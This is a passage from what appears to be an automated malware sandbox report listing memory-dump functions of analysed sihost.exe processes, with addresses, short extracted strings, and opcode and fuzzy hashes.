Opcode ID: 4fe8795a272dadb8bb6af11d3dcbc5c65920d5c2da652ffeffb3a97b9837552e
Instruction ID: 0d86a8cc8d3c854d13589092fdf05be0ba7e95fc4eb6bd462a5676def97b0342
Opcode Fuzzy Hash: 4fe8795a272dadb8bb6af11d3dcbc5c65920d5c2da652ffeffb3a97b9837552e
Instruction Fuzzy Hash: 9EC08C20D2F80F0AF405B32E14020ACA1005BC4390FD001B3C80C401C5AE0D21C5026E

Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2284286214.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a967f3c778237060e295b8758f84fd0012577d6ea661a812beb46ef2f8a89ce6
Instruction ID: c5f6d50508a4809d876c37d1e3f8c86f013ae2530f61b38e5336eaeb995bd724
Opcode Fuzzy Hash: a967f3c778237060e295b8758f84fd0012577d6ea661a812beb46ef2f8a89ce6
Instruction Fuzzy Hash: C7B01210C7F44F05E408337A084206970405B84244FC001F2D80C501C1994D1094036A

Function 00007FF848F34B95 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2284286214.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa913ab83c13ea269090e6e9798ac3dd922ec5946686a66c3bd59b216f50c34
Instruction ID: 10482da17dc50666d7944edef1e2c6e5ccdff4e75df360de3bf34439f11fe778
Opcode Fuzzy Hash: 9fa913ab83c13ea269090e6e9798ac3dd922ec5946686a66c3bd59b216f50c34
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FF848F309B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FF848F30B46
c9, xrefs: 00007FF848F30B56
!k9, xrefs: 00007FF848F30B4E
#{9, xrefs: 00007FF848F30B3E

Memory Dump Source

Source File: 0000001D.00000002.2284286214.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 363e173b441e8781b69fcc595ceb6685bdfc454e08dbee62e5043189dddcb4a7
Instruction ID: 70d13471ac54828c3a83f4fd5d5ce9033454167d368661a65340fac12893f821
Opcode Fuzzy Hash: 363e173b441e8781b69fcc595ceb6685bdfc454e08dbee62e5043189dddcb4a7
Instruction Fuzzy Hash: 33413A16A2F46AA9E65137BD74521FE6B64EF812B9F084377E44C8D1C38E0C608682FD

Analysis Process: sihost.exePID: 3944, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F30D48 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FF848F30DF3

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: ab34839846180981367b23ed93ac54f1cc3402056c070da7be68a99654aadec9
Instruction ID: 35cd6e51afd7573c0c2dc652ccc4ef5c678f143c4b0f434c93f74bb5fe750bbf
Opcode Fuzzy Hash: ab34839846180981367b23ed93ac54f1cc3402056c070da7be68a99654aadec9
Instruction Fuzzy Hash: F291A171A1DA8E9FE749EB2888293AA7FE1FF95350F4001ABC14AD72D2CF791805C715

Function 00007FF848F30E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4712e83a90afa616f19dac7f9c521895ce8cd2c9b6e716846bc7c7e6da8b41bb
Instruction ID: 54bdea0774d70cade6101f8afeafb50b076820e07f1022023fb98fad66201000
Opcode Fuzzy Hash: 4712e83a90afa616f19dac7f9c521895ce8cd2c9b6e716846bc7c7e6da8b41bb
Instruction Fuzzy Hash: 1851A0B1A1AA4E8EE348AB2C88693BABFE0FB85354F4001BBC10AD37D1CF791451C704

Function 00007FF848F44069 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

K_H, xrefs: 00007FF848F44074

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_sihost.jbxd

Similarity

API ID:
String ID: K_H
API String ID: 0-313846638
Opcode ID: 6e1a786e7788235c62d3bad9f9eb679ea95cdd1dac8848eb73efae6bee437d90
Instruction ID: 69e9d1a798d9fd20da55363c61e9632882e43f79c7850dd6f633eac295f1446a
Opcode Fuzzy Hash: 6e1a786e7788235c62d3bad9f9eb679ea95cdd1dac8848eb73efae6bee437d90
Instruction Fuzzy Hash: 4BF03771A0890A8FEB58EF48C818ABE77B1FB64744F00013AC016E72D5DF786A448784

Function 00007FF848F43AD9 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F43AF6

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_sihost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: dad43cbb0ec6ccfc18621cdad11622b13c39ab54ea4a387408dda5a974eb8e81
Instruction ID: b173c5c2a5c322fd9544ab06aaedb98ab0aaa9d6efe95215ff403ae1d06be914
Opcode Fuzzy Hash: dad43cbb0ec6ccfc18621cdad11622b13c39ab54ea4a387408dda5a974eb8e81
Instruction Fuzzy Hash: 6DE0ED7154E3C44FC706EB3488668457FA09E6721078A40DEC049CF1A3D61E8849C711

Function 00007FF848F41242 Relevance: .7, Instructions: 682COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1643aec01495bc381ea02c2d51e234c6b96a799a1ecfee57f4ce3d4e249cb369
Instruction ID: 3d632042c53e5b9165e04bd03323304b7c03a7ecbfef9cbe6f79652b832e72ee
Opcode Fuzzy Hash: 1643aec01495bc381ea02c2d51e234c6b96a799a1ecfee57f4ce3d4e249cb369
Instruction Fuzzy Hash: A022A431E1C95A9FE798FB2884556B973A1FFA8740F1405BAD40ED32C3DF28AD828745

Function 00007FF848F308D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f9e59e75725b7a2106911231c275e5a63e0b3d6fa62c3c4199d5db9d400be18
Instruction ID: c99b65032f8078f84a555c2b031259dbf2a0156436151d3ff9a32d4acca278e0
Opcode Fuzzy Hash: 9f9e59e75725b7a2106911231c275e5a63e0b3d6fa62c3c4199d5db9d400be18
Instruction Fuzzy Hash: 4D416922B1E51A5EE744B77CA4952FE7790EF853A5F0406BBD44DCB1D3DE1CA8428288

Function 00007FF848F3116D Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff9494e04c412d806e479cb2c8d695fcf9922a5de7ae5b8b291fac27d045829
Instruction ID: 2b06f472b357151ed9defd8a96d41c69971d6920289e5f76d26ce7915e007aa9
Opcode Fuzzy Hash: eff9494e04c412d806e479cb2c8d695fcf9922a5de7ae5b8b291fac27d045829
Instruction Fuzzy Hash: 3E31AF3190D64A8FEB45FB68C8599B97BF1FF5A350F0405BBD00AD72D2DB29A881C740

Function 00007FF848F30C25 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5102796ec05a2f538a4ecf240d7caa81ae0c432fe38e1d16aa0ed910ff9bf432
Instruction ID: 3dc66c929771aaf65415e3dd7cdfee3774873a8281ff047c5e03ffd03e982e49
Opcode Fuzzy Hash: 5102796ec05a2f538a4ecf240d7caa81ae0c432fe38e1d16aa0ed910ff9bf432
Instruction Fuzzy Hash: 0231E631D0D69ADEE311BB6898511ED7BA0EF823A1F1442B7D448DA1C3DB3C2546CB99

Function 00007FF848F30998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bbce145f6c40381a4b206c864fc6d4f4f5861aa4ff5b9d3d35066a68f03e0f6
Instruction ID: 45954673e0d65d17b20a447e7de8baac322e8cc68f535846c7cc6641b812375e
Opcode Fuzzy Hash: 3bbce145f6c40381a4b206c864fc6d4f4f5861aa4ff5b9d3d35066a68f03e0f6
Instruction Fuzzy Hash: BE219521B1DD1A0FE748B76C945A77A76C2EF98391F5000BAE80EC32D6DE199C424285

Function 00007FF848F32BA7 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c53a8a88c1f8a157c299a415c88ec7b1eb7ce06adc0975e6d2cb1624dac0495
Instruction ID: 3485b673ee04bc13881ef441f71bfd3ee8659e5470c6e922a37b8821d62a66e9
Opcode Fuzzy Hash: 3c53a8a88c1f8a157c299a415c88ec7b1eb7ce06adc0975e6d2cb1624dac0495
Instruction Fuzzy Hash: 9921B930D089698FDBA4EB48C484BA9B3E1FB58351F5441EAC00EE7694DB74AD80CB45

Function 00007FF848F37376 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8ffba572cfbc47e6d73800ab2143a4b795f7f5c1d83180a382118b091cf7537
Instruction ID: f80c4fa671fb758bc6df7c4e169921d92479349df42cc5388eabf1f2766f01e8
Opcode Fuzzy Hash: f8ffba572cfbc47e6d73800ab2143a4b795f7f5c1d83180a382118b091cf7537
Instruction Fuzzy Hash: B5115431E1C9198FE794F728C8556B876D1EF58380F5101BBD84ED32E2DF286D404689

Function 00007FF848F30C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e39f2f74d090d127083f434ae7cab474d82aa712f7905725aeb0103228bfa1e
Instruction ID: 20b86b293f29189ed15bc0effbe0aaf3233cff22707324240d52225c23bbe2d8
Opcode Fuzzy Hash: 9e39f2f74d090d127083f434ae7cab474d82aa712f7905725aeb0103228bfa1e
Instruction Fuzzy Hash: CF11A031E0D68D8FE702FB2898411AC7BB0EF82390F1541B3C844DB2D2DA3855068785

Function 00007FF848F30C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5049d59960c95d71b6439b1d7afe14823d8c2684a7422db5e7c2a4322fb8e18
Instruction ID: 6b8b55942b9aabc352e0cf82fe6e278102cb97d4ac58e5b11bd7c9de36e44f11
Opcode Fuzzy Hash: f5049d59960c95d71b6439b1d7afe14823d8c2684a7422db5e7c2a4322fb8e18
Instruction Fuzzy Hash: 9B11AD31E0D68D8FE702FB2898500AD7BB0EF82390F1541F7D844DB2D2DA386649CB85

Function 00007FF848F44511 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a321e5259d42d5283b0a0b99008d3a1288c2c283b0e52e309fea75377c26aec2
Instruction ID: 99f69c21d484315b15523d3d96fee5dd10975a57183f8210fda438233bf33361
Opcode Fuzzy Hash: a321e5259d42d5283b0a0b99008d3a1288c2c283b0e52e309fea75377c26aec2
Instruction Fuzzy Hash: 1D01F931E0DAC64FE751B32488642A93B92EFB1354F1802BBC04ED71D2DE1C99454356

Function 00007FF848F30C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bf36d6020becad6d9361ff571d087511b9d3d740d42621d1c9e514f898ef2e0
Instruction ID: 308d5f4b18b8f7ae12de221ef17799af10f96c4e33668227ce866e590cabf53c
Opcode Fuzzy Hash: 2bf36d6020becad6d9361ff571d087511b9d3d740d42621d1c9e514f898ef2e0
Instruction Fuzzy Hash: F0014835D0D289DFE716FB6888401AD7BB0EF82390F1541F7D844DB2D2DA386A49CB85

Function 00007FF848F30C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed87d68c6c47959c17f30311fc06c21540aa27be8aaa90562b60bcdfe4978380
Instruction ID: 2a5a3fa03c5b11e33eb31bc426a910c0c935cd64e69acd8e9bcc7b4b5bb853d6
Opcode Fuzzy Hash: ed87d68c6c47959c17f30311fc06c21540aa27be8aaa90562b60bcdfe4978380
Instruction Fuzzy Hash: BE011634D0D2899FE716FB6488941AD7BB0EF82394F1441F7D844DB2D2DA386A458785

Function 00007FF848F373CE Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c43b8144e0c92ad10de4a3a47d61e626731de3e5266ba07dc53dcc74846e3ec1
Instruction ID: 0f623bd71c1d0627ec64bd9e53ddeb7cd5982f7d09f3d321edb0eebb224106ef
Opcode Fuzzy Hash: c43b8144e0c92ad10de4a3a47d61e626731de3e5266ba07dc53dcc74846e3ec1
Instruction Fuzzy Hash: 1801CD31D5C81E8FEB94FB14D8557F872A1EB55351F1140BAD84ED31E2DF286D818A48

Function 00007FF848F36EE8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6aeec13845af2f53f077f301041bd6a6be401a36209cc8f6e0ff845423fb2c6
Instruction ID: 03275bc3dc22b49dbf0508bf3efc332aab18c61863bfb2fe35c94f12df8fb206
Opcode Fuzzy Hash: b6aeec13845af2f53f077f301041bd6a6be401a36209cc8f6e0ff845423fb2c6
Instruction Fuzzy Hash: 26F0DA31A0C80A5FEA94F72C94596B863D2EFD83A0F0941B7D80DD72D6EE18A8824744

Function 00007FF848F37408 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df188726e69e49b1a523e0ce474c9b9b82e8aab567bb001305f47ea735b6bdb
Instruction ID: e248ef353c9b213486047315d3328174b1d1d5a1ee6628783d64f576ddc6523f
Opcode Fuzzy Hash: 7df188726e69e49b1a523e0ce474c9b9b82e8aab567bb001305f47ea735b6bdb
Instruction Fuzzy Hash: 14F0D031E0C8198FEA94F714D8547F82391AF99350F1141BBDC8ED32E2DF286D814689

Function 00007FF848F30B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60fd90d157bd0d449b78653439052b65d16bd1deeb035aa5d267f866c9284d6
Instruction ID: d6dfd882f4c151bd7db68b5324e20095532347af932dc2beb8f4931c69d6c243
Opcode Fuzzy Hash: d60fd90d157bd0d449b78653439052b65d16bd1deeb035aa5d267f866c9284d6
Instruction Fuzzy Hash: F4F0E53511E549CFC745EB38D8A54D4BF60FF03214B9A12EAD089C75A2E311485DC700

Function 00007FF848F446FD Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c45cdb7c8eebcf94585e65e33085daf485201ffa9ecc6014a162f2910720ef9
Instruction ID: a25acce56357fb3b45690b1711c335ac65f1713a7a981ad5d28370016a4a1ded
Opcode Fuzzy Hash: 6c45cdb7c8eebcf94585e65e33085daf485201ffa9ecc6014a162f2910720ef9
Instruction Fuzzy Hash: 49F06531A0C54A4FEA18FF08D880AB97391FF34754F114577E84AE31D6EF28A8019688

Function 00007FF848F45180 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf526c727a200d67b7dc7eb06edb6a6cb44d31c04c12d85fe8f15c5aae398ef4
Instruction ID: 8eec10f30a0b111d9afc70fbbec5301b1b2d10d3ebac2d1aa9af4f5331ee89f8
Opcode Fuzzy Hash: bf526c727a200d67b7dc7eb06edb6a6cb44d31c04c12d85fe8f15c5aae398ef4
Instruction Fuzzy Hash: 5DD05E30B6090D4B8B0CB62D8458430F3D1E7AA6067D452B8940BC2281ED25ECC68B84

Function 00007FF848F36E6A Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a380cd7d0d4970fbf344f8d6e516afdc27446f02f593f61e45bc23ac6242da30
Instruction ID: f2e75a3d79b5f36443f394a7069f6f9b2ad6cc5c0dd5ddf3dba5bdc8831c8d81
Opcode Fuzzy Hash: a380cd7d0d4970fbf344f8d6e516afdc27446f02f593f61e45bc23ac6242da30
Instruction Fuzzy Hash: 91E01234D0C01A4BF799B344D8517E96290EB88340F1450BADA1ED33C5EE38AF448B49

Function 00007FF848F331E3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff669bed463a5f8029a2bdec753fa8c8de2d19eeb8733a80c87ccf3c5e720f2
Instruction ID: bc9ac8c178bb2ccb0fb2a4f8158a2922d7fe9258ef20a4d981494e3c96d389fa
Opcode Fuzzy Hash: 7ff669bed463a5f8029a2bdec753fa8c8de2d19eeb8733a80c87ccf3c5e720f2
Instruction Fuzzy Hash: 3EE0C210E0D8264AF25AB3244C1123F28825F80394F084032E40ED36C6EE4C6A4502C9

Function 00007FF848F43AF0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF848F306A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe8795a272dadb8bb6af11d3dcbc5c65920d5c2da652ffeffb3a97b9837552e
Instruction ID: 0d86a8cc8d3c854d13589092fdf05be0ba7e95fc4eb6bd462a5676def97b0342
Opcode Fuzzy Hash: 4fe8795a272dadb8bb6af11d3dcbc5c65920d5c2da652ffeffb3a97b9837552e
Instruction Fuzzy Hash: 9EC08C20D2F80F0AF405B32E14020ACA1005BC4390FD001B3C80C401C5AE0D21C5026E

Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a967f3c778237060e295b8758f84fd0012577d6ea661a812beb46ef2f8a89ce6
Instruction ID: c5f6d50508a4809d876c37d1e3f8c86f013ae2530f61b38e5336eaeb995bd724
Opcode Fuzzy Hash: a967f3c778237060e295b8758f84fd0012577d6ea661a812beb46ef2f8a89ce6
Instruction Fuzzy Hash: C7B01210C7F44F05E408337A084206970405B84244FC001F2D80C501C1994D1094036A

Function 00007FF848F34B95 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa913ab83c13ea269090e6e9798ac3dd922ec5946686a66c3bd59b216f50c34
Instruction ID: 10482da17dc50666d7944edef1e2c6e5ccdff4e75df360de3bf34439f11fe778
Opcode Fuzzy Hash: 9fa913ab83c13ea269090e6e9798ac3dd922ec5946686a66c3bd59b216f50c34
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FF848F309B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FF848F30B46
c9, xrefs: 00007FF848F30B56
#{9, xrefs: 00007FF848F30B3E
!k9, xrefs: 00007FF848F30B4E

Memory Dump Source

Source File: 0000001E.00000002.2292137258.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_sihost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 363e173b441e8781b69fcc595ceb6685bdfc454e08dbee62e5043189dddcb4a7
Instruction ID: 70d13471ac54828c3a83f4fd5d5ce9033454167d368661a65340fac12893f821
Opcode Fuzzy Hash: 363e173b441e8781b69fcc595ceb6685bdfc454e08dbee62e5043189dddcb4a7
Instruction Fuzzy Hash: 33413A16A2F46AA9E65137BD74521FE6B64EF812B9F084377E44C8D1C38E0C608682FD

Analysis Process: sihost.exePID: 1264, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F10D48 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

5[_H, xrefs: 00007FF848F10DF3

Memory Dump Source

Source File: 0000001F.00000002.2288955746.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f10000_sihost.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: d290ce26d8c69a6d98816dfe6c9f4a4d151aaaa53accb0ae7d394b60abe8f516
Instruction ID: 2e693c8d0cb42169102f6263782bfa1343d62f9520590a03e1af65bbd5467243
Opcode Fuzzy Hash: d290ce26d8c69a6d98816dfe6c9f4a4d151aaaa53accb0ae7d394b60abe8f516
Instruction Fuzzy Hash: A591CC75D1DA9A9EE789EB2C88293B97FE1FB96350F4000BEC009D72D6CF7818058714

Function 00007FF848F10E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2288955746.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f10000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13619a71b2271dd2545cf838cd2b81bf536da2ac5d3b5d3df25a72e7a15e9c7a
Instruction ID: 755ee613658b91db935aeea2785635ed27e8a14ff3c35f75cf21065990f84ace
Opcode Fuzzy Hash: 13619a71b2271dd2545cf838cd2b81bf536da2ac5d3b5d3df25a72e7a15e9c7a
Instruction Fuzzy Hash: 5051CD7592CA5E9EE388EB2C84693B97FE0FB95360F40007EC009D73D5CB7918558304

Function 00007FF848F108D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2288955746.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f10000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
